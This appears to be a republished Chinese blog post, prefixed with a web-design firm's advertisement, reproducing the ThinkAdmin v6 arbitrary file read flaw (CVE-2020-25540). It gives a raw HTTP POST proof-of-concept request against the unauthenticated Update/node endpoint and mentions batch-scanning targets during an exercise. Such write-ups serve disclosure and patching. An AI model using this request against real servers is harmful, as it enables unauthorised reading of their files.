本篇文章為大家展示了如何進(jìn)行Thinkadmin v6任意文件讀取漏洞復(fù)現(xiàn)，內(nèi)容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細(xì)介紹希望你能有所收獲。

創(chuàng)新互聯(lián)是一家集網(wǎng)站建設(shè),屯溪企業(yè)網(wǎng)站建設(shè),屯溪品牌網(wǎng)站建設(shè),網(wǎng)站定制,屯溪網(wǎng)站建設(shè)報價,網(wǎng)絡(luò)營銷,網(wǎng)絡(luò)優(yōu)化,屯溪網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè)，幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強(qiáng)企業(yè)競爭力?？沙浞譂M足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時我們時刻保持專業(yè)、時尚、前沿，時刻以成就客戶成長自我，堅持不斷學(xué)習(xí)、思考、沉淀、凈化自己，讓我們?yōu)楦嗟钠髽I(yè)打造出實用型網(wǎng)站。

Thinkadmin v6任意文件讀取漏洞（CVE-2020-25540）復(fù)現(xiàn)

一、漏洞簡介:

ThinkAdmin是一套基于ThinkPHP框架的通用后臺管理系統(tǒng)，ThinkAdmin 的權(quán)限管理基于標(biāo)準(zhǔn)RBAC簡化而來，去除了繁雜的節(jié)點管理，使得權(quán)限管理起來更簡單，具體包含節(jié)點管理、權(quán)限管理、菜單管理、用戶管理。ThinkAdmin 6版本存在路徑遍歷漏洞。攻擊者可利用該漏洞通過GET請求編碼參數(shù)任意讀取遠(yuǎn)程服務(wù)器上的文件。

二、漏洞成因:

https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php

Update.php中的函數(shù)方法未授權(quán)，可直接函數(shù)可直接調(diào)用。導(dǎo)致漏洞

三、影響范圍:

Thinkadmin版本小于 ≤ 2020.08.03.01

四、漏洞復(fù)現(xiàn):

POC：

POST/admin.html?s=admin/api.Update/nodeHTTP/1.1Host: 127.0.0.1Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22rules=%5B%22.%2F%22%5D

簡單寫了一個批量的小腳本

跑了一部分，成功的不多，HVV尾聲了，情況也正常。

發(fā)現(xiàn)一個詭異的地方：burp直接放包不能成功回去json的返回數(shù)據(jù)

python-嘗試python的request的post方法可以返回

嘗試curl的post的方法可以正常返回數(shù)據(jù)

下來再來研究這個問題。

五、修復(fù)方案:

目前廠商已經(jīng)發(fā)布修復(fù)相關(guān)問題，請受影響用戶盡快升級到安全版本

上述內(nèi)容就是如何進(jìn)行Thinkadmin v6任意文件讀取漏洞復(fù)現(xiàn)，你們學(xué)到知識或技能了嗎？如果還想學(xué)到更多技能或者豐富自己的知識儲備，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。